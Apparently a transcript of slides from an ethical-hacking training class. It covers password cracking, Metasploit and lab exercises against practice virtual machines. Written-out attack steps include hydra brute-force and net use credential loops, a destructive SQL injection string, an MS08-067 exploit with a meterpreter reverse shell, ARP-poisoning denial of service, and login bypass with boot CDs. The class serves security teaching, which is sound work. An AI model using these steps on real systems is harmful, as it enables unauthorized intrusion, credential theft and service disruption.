Download presentation
Presentation is loading. Please wait.
Published byAmber Welch Modified over 9 years ago
2
Strengths Weakness Security Interests Something Fun 2
3
Give students offensive knowledge to better defend computer networks Hands-on security training to compliment theory, put theories into practice ◦ “Tell me and I'll forget; show me and I may remember; involve me and I'll understand.” Knowledge sharing: the power of group learning 3
4
Group Exercise: What do you seen in the following pictures? 4
5
Increase experience with a multitude of security aspects Network with other security-minded professionals Play in a safe lab environment not offered at work or home Earn CPEs to maintain certifications without high costs ◦ For CISSP Preparing and presenting 2 hour presentation = 8 CPEs Participating 1 hour = 1 CPE Updating existing presentation (see ISC2 chart for specifics) 5
6
Have your questions answered, bring hard issues that require solutions Improve public speaking and training skills 6
7
7 CEH Certified Ethical Hacker Study Guide CEH Certified Ethical Hacker Study Guide Kimberly Graves, 2010 Course Chapters: Chapter 1: Introduction to Ethical Hacking, Ethics, and Legality Chapter 2: Gathering Target Information: Reconnaissance, Footprinting, and Social Engineering Chapter 3: Gathering Network and Host Information: Scanning and Enumeration Chapter 4: System Hacking: Password Cracking, Escalating Privileges, and Hiding Files Chapter 5: Trojans, Backdoors, Viruses, and Worms Chapter 6: Gathering Data from Networks: Sniffers Chapter 7: Denial of Service and Session Hijacking Chapter 8: Web Hacking: Google, Web Servers, Web Application Vulnerabilities, and Web-Based Password Cracking Techniques Chapter 9: Attacking Applications: SQL Injection and Buffer Overflows Chapter 10: Wireless Network Hacking Wi-Fi and Ethernet Chapter 11: Physical Site Security Chapter 12: Hacking Linux Systems Chapter 14: Cryptography Chapter 15: Performing a Penetration Test Amazon.com
8
Class 1: Methodologies and Lab Setup Class 2: Passive Information Gathering Class 3: Active Information Gathering (Nessus) Class 4: Target System Penetration Class 5: Wireless and Wired Network Enumeration Class 6: Privilege Escalation, Maintaining Access, and Malware Class 7: Web Application Penetration Class 8: Covering Tracks, IDS, Reporting, and Cleanup Class 9: Metasploit Class 10: Physical Security (Lock Picking etc.) Class 11: Capture the Flag 8
9
System Hacking Password Attacks Remote Exploits via Metasploit Web Application Penetration Social Engineering Attacks DoS Attacks Exercises 9
10
DO NOT perform any activities from this course on any network/system or on a network connected device without proper permission! Make sure you have written permission and authorization to conduct these activities on any system. Conducting any activities related to penetration testing requires the consent of the owner of the target system and the internet service provider. Failure to obtain consent in the form of a legal contract can result in fines and imprisonment. 10
11
Information Systems Security Assessment Framework (ISSAF) 11
12
Kimberly Graves CEH Book 12
13
With a username/password combination, you can log in to the target via a running service With only a username or password, use an online cracker If both are unknown, use an online cracker, exploit code or an automated exploit tool After gaining access to the target, secure the communications link and escalate user privileges for greater system access 13
14
Security depends highly on passwords and the ability to keep them secret. Something you know Importance of length and complexity People write passwords down Most people use the min required length 14
15
Passive Online Active Online Offline Non Electronic 15
16
Sniffing ◦ Not detectable ◦ Capture the clear text or hash Man in-the-middle ◦ Intercept authentication request and forward to server Replay Attacks ◦ Capture and latter resend authentication packets ◦ Don’t have to know the password, just replay it. 16 Tools: Acquire clear-text passwords over the network using sniffing tools ScoopLM, Ettercap, Cain and Able
17
Password Guessing Use common default credentials ◦ Example user names: administrator, admin, sys, root ◦ Example passwords: password, oracle, etc. Connect to a share ex. \\ip _address\c$, SSH, RDP, FTP, Etc. Use automated tools/scripts Using the reconnaissance info create targeted password lists based on high to low probability ◦ If min length is 8 don’t try password less than 8 ◦ Try most commonly used special char ex !, @, $ 17
18
A free, online, login-cracking tool that can attack many services Uses a given username and password combination to brute force the service login Use short username and password lists for best performance Most useful for breaking into a system with a weak password or for which a username is known hydra -l username -P password_list IP_address service 18
19
Create a simple username and password file using Windows Notepad. Save the file as credentials.txt. Pipe this file using the FOR command to use the credentials.txt file to attempt to log on to the target system’s hidden share. C:\> FOR /F “token=1, 2*” %i in (credentials.txt) do net use \\target\IPC$ %i /u: %j 19
20
Defenses: ◦ Two-factor authentication ◦ Account lockouts/max attempts ◦ Log/review brute force attempts C:\windows\system32\config\Sec.Evt /var/log or /var/log/lastlog ◦ Password change interval 20
21
Defenses: ◦ Creating strong passwords 1.Start with a memorable phrase, such as Maryhadalittlelamb 2. Change every other character to uppercase, resulting in MaRyHaDaLiTtLeLaMb 3. Change a to @ and i to 1 to yield M@RyH@D@L1TtLeL@Mb 4. Drop every other pair to result in a secure repeatable password M@H@L1LeMb (this can easily be remade) 21 Do you have any other suggestions?
22
Usually requires physical access Dump password file (shadow/SAM) ◦ C:\windows\system32\config vs. /etc/shadow Types of Offline Password Attacks ◦ Dictionary ex. Experience ◦ Hybrid ex. Exper1ence ◦ Brute Force ex. !QAZxdr%16 Given enough time and processing power passwords can be cracked (Moore's Law) 22
23
Decrypt passwords stored in Windows SAM or Linux shadow files using dictionary, hybrid, brute-force, or rainbow table methods John the Ripper, Cain and Abel, Ophcrack 23
24
24 A free, cross-platform, password-breaking tool that can break many different kinds of encryption DES MD5 Kerberos AFS LM hash Uses offline dictionary and/or brute force attacks to compare encrypted strings and find the password Dictionary Attack 24
25
Social Engineering Shoulder Surfing Dumpster Diving 25
26
26 -Software Keyloggers easily detected with anti-virus -Hardware keyloggers hard to detect
27
Easily analyze overall network security by scanning the network, identifying vulnerabilities, launching attacks, and creating a report in one step Types of tools: Source code assessment: application source code flaws Application assessment: application runtime errors System assessment: system or network configuration problems 27
28
Source code assessment tools can detect buffer overflows, possible privilege escalation, race conditions, and bad input Rough Auditing Tool for Security (free) Application assessment tools analyze runtime issues AppDetective (commercial) N-Stalker Web Application Security Scanner (free/commercial) 28
29
Explore vulnerabilities in system-level security measures Nessus (free/commercial) Retina (commercial) Rapid7 (free/commercial) 29
30
Open source vulnerability assessment tool Select exploit module Configure the exploit Select the payload Launch the exploit Contains console-based GUI and a command-line interface Armitage Find more exploit codes to use with or without Metasploit in online databases www.securityvulns.com www.securityvulns.com 30
31
Commercial GUI automated assessment and exploit tool Contains all the steps of a pen test process from scanning to reporting and cleanup Can return the target system to pre-attack state after a test 31
32
32
33
Exploit Pack ◦ Tool to easily create custom exploits and a new pentest tool competitor ◦ http://thehackernews.com/2011/10/exploit-pack-open-source- security.html http://thehackernews.com/2011/10/exploit-pack-open-source- security.html 33
34
Identify running services and operating systems by port scanning and fingerprinting Find vulnerabilities Find exploit code or sniff login information Run the exploit against the target Open a target shell on the attacking system Identify the IP address and operating system of the target system Choose an exploit from the database Choose a payload Choose an encoding method Run the exploit against the target Manual Attack Metasploit Attack 34
35
WEP cracking can use one or two systems One injects traffic and the other sniffs traffic from the victim Aircrack is a tool that provides everything needed to crack WEP including: Airodump — captures wireless packets Aireplay — performs injection attacks Aircrack — cracks WEP keys Other tools: THC-wardrive WaveStumbler Airsnarf Airsnort Airtraf Omnipeek 35
36
Denial of Service An attack that does not give the attacker access to the system, but makes the service unavailable to users by flooding the target with network packets Types of wireless DoS attacks: Authentication flood Deauthentication flood Network jamming Equipment destruction 36
37
Finding vulnerabilities and exploiting them in the application Allows access to data and even to the system SQL Injection SELECT * FROM items WHERE owner = 'hacker' AND itemname = 'name'; DELETE FROM items; --' 37
38
38
40
Lab setup Exercises 40
41
41 Host Operating System = Ubuntu (Linux) Virtual Machine = Virtual Box VM’s = Backtrack, Windows (Guest PC), XP-1, badstore Each laptop has its own separate standalone lab environment How to start the lab environment… 1) Open Virtual Box 2) Ensure that the Backtrack VM is powered on 3) Logon to Backtrack (root/toor) and type startx 4) Set the static IP address (.100) ifconfig eth3 10.0.2.100 netmask 255.255.255.0 up 5) Ensure that the badstore VM has the badstore CD mounted and then start the VM 6) Configure the badstore VM IP address via the following command: ifconfig eth0 10.0.2.200 netmask 255.255.255.0 up
42
In the following Scenario, you have already gathered as much information about your target as possible for planning the attack. Your target is example.com. The company has hired you to confirm that their continuous monitoring program is working effectively. The administrators claim to have patched and hardened every machine. Now it is your job to see if any of the systems can be hacked. 42
43
Remotely access the application? ◦ Example: SQL Injection 43
44
Video 44
45
Remotely access the system via social engineering? ◦ Example: Malicious email (spear phishing) 45
46
Navigate to http://www.social- engineer.org/framework/Computer_Based_Social_Engineering _Tools:_Social_Engineer_Toolkit_(SET)http://www.social- engineer.org/framework/Computer_Based_Social_Engineering _Tools:_Social_Engineer_Toolkit_(SET) Read the first paragraph introducing SET. From the table of contents click on 3.1 Spear-Phishing Attack Vector and review how an example of how SET can be used.3.1 Spear-Phishing Attack Vector Note: after gathering all the recon info, it is easy to use the SET to conduct computer based social engineering. Or view the video: http://www.social- engineer.org/resources/Social-Engineering-Email-Attack- using-SET/Social-Engineering-Email-Attack-using-SET.htmlhttp://www.social- engineer.org/resources/Social-Engineering-Email-Attack- using-SET/Social-Engineering-Email-Attack-using-SET.html 46
47
Remotely access the system via network pentesting tools? ◦ Example: Metasploit or CoreImpact 47
48
From the Guest workstation: Logon u=visitor p=qwerty Open the Nessus client via the link on the desktop From the reports tab, browse the internal network scan report Click on “show filters” Check “exploit exists” Review the exploits that can be run against 10.0.2.15 for high vulnerabilities ◦ MS08_067 48
49
Open a terminal in Backtrack and type: msfconsole How many exploits and payloads are available? ◦ 684 exploits and 217 payloads Type: show ms08_067 When was the exploit disclosed and what is the ranking? ◦ Disclosed: 10/28/2008, Ranking: Great To use the exploit type: ◦ use windows/smb/ms08_067_netapi ◦ set payload windows/meterpreter/reverse_tcp ◦ set lhost 10.0.2.100 ◦ set rhost 10.0.2.15 ◦ exploit 49
50
A meterpreter session will display. To show the meterpreter option type: help We are going to start a command shell on the victim system Type: execute -f cmd.exe -c –i To confirm your on the victim system type: hostname Note: with an admin user command shell the system is owned. If we did not have admin we would need to escalate privileges. 50
51
Next we will grab a screen capture of the victims screen ◦ To review the list of processes type: ps ◦ Note the windows explorer process id ◦ Migrate the explorer process id, example type: migrate 168 ◦ Next load and use meterpreter extension "espia" to enable capture on victim screen ◦ Type: use espia ◦ Run screengrab to start capturing victim screenshot ◦ Type: screengrab 51
52
From Backtrack open a terminal and type: armitage Click the “start msf” button It will take a few moments to load Enter the attack computer IP in the dialog box: 10.0.2.100 From the menu bar Hosts Nmap scan Intense scan Enter range: 10.0.2.0/24 Watch the nmap output as the scan is running When the scan completes, hit “ok” In the search tool bar, type ms08_067 Double click the exploit, review the options, and click launch If the exploit is successful, the icon will have lighting bolts and the console screen will report an open meterpreter session 52
53
Kill the meterpreter session, right click the victim meterpreter kill What if we did not know what attack to use, we could use Armitage to show us available attacks ◦ From the menu Attacks Find Attacks by vulnerability ◦ Choose “ok” on the dialog box. ◦ Rich click the target system Attack SMB ms08_067 What if you wanted to automate the process or did not know what to exploit (Hailmary) ◦ From the menu Attacks Hailmary by vulnerability ◦ Watch as the victim is auto owned 53
54
Now that you have a meterpreter session you could dump the hash, grab screen captures, run keyloggers etc. Lets try a victim screen capture ◦ Rich click the vicitim meterpreter explore screenshot 54
55
Video 55
56
Passively obtain passwords to remotely access the system? ◦ Example: Sniff Passwords 56
57
Right click “my computer” services Right click the “telnet” service change the startup type to automatic Press the “start” button and then hit “ok”. From a Backtrack terminal type: wireshark From the interface list choose eth3 Open another terminal and type: telnet 10.0.2.15 Enter the username and password Stop the running live capture and review it for credentials Right click on a record containing telnet and choose “follow tcp stream” Can you see the password in plan text? 57
58
From the guest pc, load start Cain and able from the desktop shortcut Press the start/stop sniffing button and a dialog box will appear Choose the network to sniff (10.0.2.0/24) and press “ok” From backtrack, open a terminal and type: telnet 10.0.2.15 Enter the username/password (ex. visitor/qwerty) From the guest pc, click on the sniffer tab, and then click on the passwords tab Right click on the recorded record to view the telnet credential information. 58
59
Ensure that badstore is up and running. From the guest pc, open a web browser to: ◦ http://10.0.2.200/cgi-bin/badstore.cgi Click the login/register link Create a new account Go back to the Cain and able screen Under the passwords tab, click on http Note the username and password has been captured 59
60
Attempt remote logon? ◦ via online password attacks using hydra, scripts 60
61
1. We are going to try to get the account information of a user by brute- forcing an Telnet login. Open a command line terminal in BackTrack, type hydra and hit Enter to see the options 2. What options do we need to use to customize hydra to: 1.Input a login name? A file of login names? 2.Input a file of passwords? 3.Try the login name as the password? 4.Stop running after a login pair is found? 5.Limit the number of parallel tasks? 3. Use all the following options with the base command hydra –L users.txt –P passwords.txt 10.0.2.15 telnet 1.Login name file: users.txt 2.Password file: passwords.txt 4. What login name/password combination was found? 61
62
Gain physical access to the system to logon? ◦ Example: Password cracking Live CD (Ophcrack), Konboot, Windows Ultimate Boot CD 62
63
1. From the VM settings menu for XP-1 place the konboot iso in the CD drive. 2. Reboot/boot XP-1 3. The konboot program will boot from the CD. Press enter when the initial konboot screen appears. 4. Once the windows operating system has finished loading you can log on with no password. 5. Click Administrator. Note: you accessed the machine with admin rights and no password. 63
64
1. From the VM settings menu for XP-1 place the Ophrack iso in the CD drive. 2. Reboot the XP-1 3. The Ophcrack program will boot from the CD 4. Choose the following options once the CD boots Choose low RAM Hit of for EN-English Scroll to the bottom and choose US-USA Choose screen of 1024x768x16 Now Ophcrack will auto load and start cracking passwords 64
65
Note: Stop the password cracking once you have cracked 3/5 passwords (~3 minutes) by choosing stop. 4. Record the usernames and passwords 5.Are there any passwords that did not get cracked…? If so, why do you think the password did not get cracked? ◦ Note: How short it took to crack the password and the importance of strong passwords. 65 Ophrack XP Rainbow Tables
66
6. Exit Ophcrack by pressing any key from the terminal window. Then press “Y” to shutdown the PC. 7. Remove Ophcrack from the CD drive. 8. Power on XP-1. 66
67
If konboot does not work, and your not able to get the passwords using Ophcrack, you will need to reset the password. 1. From the VM settings menu for XP-1 place the ubcd4.iso in the CD drive. 2. Reboot/boot XP-1 3. The Windows Ultimate Boot program will boot from the CD 4. At the welcome screen press enter to “launch” the ubcd program 5. On the preshell window press start shell or wait 3 seconds for it to auto run. 6. The network dialog window will appear, choose No, since you do not want to start the networking configuration. 67
68
7. When the o/s has finished booting open the password reset tool -start programs Password Tools NTPWEdit 8. Press the “re-open” button -Note the users on the machine. The true built in admin account will have ID 500. 9.Select the true admin account and press the “change password” button. 10. Press the “save changes” button 11. Press the “exit” button 12. Shutdown XP-1 13. Remove ubcd4 from the VM CD drive on XP-1 14. Boot XP-1 and use the new password for the admin account 68
69
Remotely access the application? Remotely access the system via social engineering? Remotely access the system via network pentesting tools? Obtain passwords to remotely access the system? Attempt remote logon online password attacks? Gain physical access to the system to logon? When all else fails: ◦ Denial of Service 69 Failed
70
Verify that the badstore VM is up and running From the guest pc, open a web browser to the badstore site: ◦ http:// 10.0.2.200/cgi-bin/badstore.cgi From backtrack open a terminal and type: ettercap –G From the menu sniff unified sniffing Choose the network interface to use: eth3 From the menu Hosts scan for hosts Press h to view the host list. From the menu Mitm Arp poisoning From the guest pc, open a web browser to the badstore site: ◦ http:// 10.0.2.200/cgi-bin/badstore.cgi ◦ Note the website is not accessible from the guest pc 70
71
Video 71
72
After gaining initial access to the target system, it is necessary to keep going Open a backdoor to maintain access Hide traces of the break-in Escalate privileges and attack other computers on the network with the victim as the attack source Next class: Enumeration and Post Penetration Questions? 72
73
http://www.dc-cybersecurity.com/ http://www.dc-cybersecurity.com/ http://www.amazon.com/Certified-Ethical-Hacker-All-Guide/dp/0071772294 http://www.amazon.com/Certified-Ethical-Hacker-All-Guide/dp/0071772294 http://www.amazon.com/Certified-Ethical-Hacker-Study- Guide/dp/0470525207/ref=sr_1_1?s=books&ie=UTF8&qid=1323531433&sr=1-1 http://www.amazon.com/Certified-Ethical-Hacker-Study- Guide/dp/0470525207/ref=sr_1_1?s=books&ie=UTF8&qid=1323531433&sr=1-1 http://www.amazon.com/Build-Your-Own-Security- Lab/dp/0470179864/ref=sr_1_1?s=books&ie=UTF8&qid=1323535901&sr=1-1 http://www.amazon.com/Build-Your-Own-Security- Lab/dp/0470179864/ref=sr_1_1?s=books&ie=UTF8&qid=1323535901&sr=1-1 http://en.wikipedia.org/wiki/Kevin_Mitnick http://en.wikipedia.org/wiki/Kevin_Mitnick Oceans 11 clip: http://www.youtube.com/watch?v=Shg__OqtEwY Oceans 11 clip: http://www.youtube.com/watch?v=Shg__OqtEwY http://www.independent.co.uk/news/uk/this-britain/rafs-wartime-reconnaissance- photos-go-online-in-new-archive-1825926.html?action=gallery&ino=6 http://www.independent.co.uk/news/uk/this-britain/rafs-wartime-reconnaissance- photos-go-online-in-new-archive-1825926.html?action=gallery&ino=6 www.anywho.com www.anywho.com people.yahoo.com people.yahoo.com www.zabasearch.com www.zabasearch.com www.peoplesearchnow.com www.peoplesearchnow.com www.ZoomInfo.com www.ZoomInfo.com www.facebook.com www.facebook.com www.Linkedin.com www.Linkedin.com 73
74
http://www.backtrack-linux.org/ http://www.backtrack-linux.org/ http://www.de-ice.net/ http://www.de-ice.net/ National Vulnerability Database (nvd.nist.gov) Exploit-Database (exploit-db.com) Securitytracker (www.securitytracker.com)www.securitytracker.com Securiteam (www.securiteam.com)www.securiteam.com Hackerstorm Vulnerability Research (www.hackerstorm.com)www.hackerstorm.com Hackerwatch (www.hackerwatch.org)www.hackerwatch.org SecurityFocus (www.securityfocus.com)www.securityfocus.com Security Magazine (www.securitymagazine.com)www.securitymagazine.com SC Magazine (www.scmagazine.com)www.scmagazine.com www.myspace.com www.myspace.com http://investigatrixx.wordpress.com/2008/10/03/how-to-conduct-your-own-stake-out- surveillance/ http://investigatrixx.wordpress.com/2008/10/03/how-to-conduct-your-own-stake-out- surveillance/ http://www.ehow.com/how_4829346_run-credit-check-somebody.html http://www.ehow.com/how_4829346_run-credit-check-somebody.html http://bobarno.com/thiefhunters/2009/08/atm-credit-card-fraud-sweden/ http://bobarno.com/thiefhunters/2009/08/atm-credit-card-fraud-sweden/ 74
75
http://investigatrixx.wordpress.com/2008/10/03/how-to-conduct-your-own-stake-out- surveillance/ http://investigatrixx.wordpress.com/2008/10/03/how-to-conduct-your-own-stake-out- surveillance/ http://www.ehow.com/how_4829346_run-credit-check-somebody.html http://www.ehow.com/how_4829346_run-credit-check-somebody.html http://bobarno.com/thiefhunters/2009/08/atm-credit-card-fraud-sweden/ http://bobarno.com/thiefhunters/2009/08/atm-credit-card-fraud-sweden/ Sarah Palin http://www.youtube.com/watch?v=vgRA8oTk8ig&feature=relatedhttp://www.youtube.com/watch?v=vgRA8oTk8ig&feature=related http://www.youtube.com/watch?v=4pnKbibi6QY http://www.youtube.com/watch?v=4pnKbibi6QY http://en.wikipedia.org/wiki/Robin_Sage http://en.wikipedia.org/wiki/Robin_Sage http://mirror.anapnea.net/hbgary/aaron_hbgary_com/attachments/5482.pdf http://mirror.anapnea.net/hbgary/aaron_hbgary_com/attachments/5482.pdf www.wigle.net www.wigle.net http://archives.cnn.com/2002/TECH/internet/08/22/net.internalmemos/ http://archives.cnn.com/2002/TECH/internet/08/22/net.internalmemos/ http://wikileaks.org/ http://wikileaks.org/ http://johnny.ihackstuff.com/ghdb/ http://johnny.ihackstuff.com/ghdb/ http://uptime.netcraft.com/up/graph http://uptime.netcraft.com/up/graph www.geektools.com/whois.php www.geektools.com/whois.php www.arin.net www.arin.net http://www.us-cert.gov/cas/bulletins/ http://www.us-cert.gov/cas/bulletins/ www.netstumbler.com www.netstumbler.com 75
76
http://www.hackerstorm.com/start.html http://www.hackerstorm.com/start.html http://www.visualroute.com http://www.visualroute.com http://www.iwebtool.com/link_extractor http://www.iwebtool.com/link_extractor http://it.toolbox.com/blogs/managing-infosec/google-hacking-master-list-28302 http://it.toolbox.com/blogs/managing-infosec/google-hacking-master-list-28302 http://cirt.net/passwords http://cirt.net/passwords http://www.social- engineer.org/framework/Computer_Based_Social_Engineering_Tools:_Social_Engineer_Too lkit_(SET) http://www.social- engineer.org/framework/Computer_Based_Social_Engineering_Tools:_Social_Engineer_Too lkit_(SET) http://www.rapid7.com/docs/metasploit-hackmiami-hack-a-thon.pdf http://www.rapid7.com/docs/metasploit-hackmiami-hack-a-thon.pdf http://www.immunitysec.com/products-documentation.shtml http://www.immunitysec.com/products-documentation.shtml http://vishnuvalentino.com/tips-and-trick/5-steps-to-screen-capture-victim-screen-using- metasploit-meterpreter/ http://vishnuvalentino.com/tips-and-trick/5-steps-to-screen-capture-victim-screen-using- metasploit-meterpreter/ sql injection http://www.youtube.com/watch?v=FwIUkAwKzG8http://www.youtube.com/watch?v=FwIUkAwKzG8 office space http://www.youtube.com/watch?v=dN3v0drnTdQhttp://www.youtube.com/watch?v=dN3v0drnTdQ core impact http://www.youtube.com/watch?v=SsI41_ZYB8chttp://www.youtube.com/watch?v=SsI41_ZYB8c http://www.qualys.com/docs/wave_vulnerability_management_q2_2010.pdf http://www.qualys.com/docs/wave_vulnerability_management_q2_2010.pdf 76
77
PDF mapping tools to the different phases of Pen testing. Review the list of tools and pick tools that you know and can demonstrate or that you would like to learn more about. 77 CEH Certified Ethical Hacker All-in-One Exam Guide Amazon.com
78
Social Engineering Toolkit Maltego Linux (Mike) Snort Wireshark Nessus Web Security (KB) Crypto (KB) Nmap Metasploit 78
79
79 TBD
Similar presentations
© 2024 SlidePlayer.com Inc.
All rights reserved.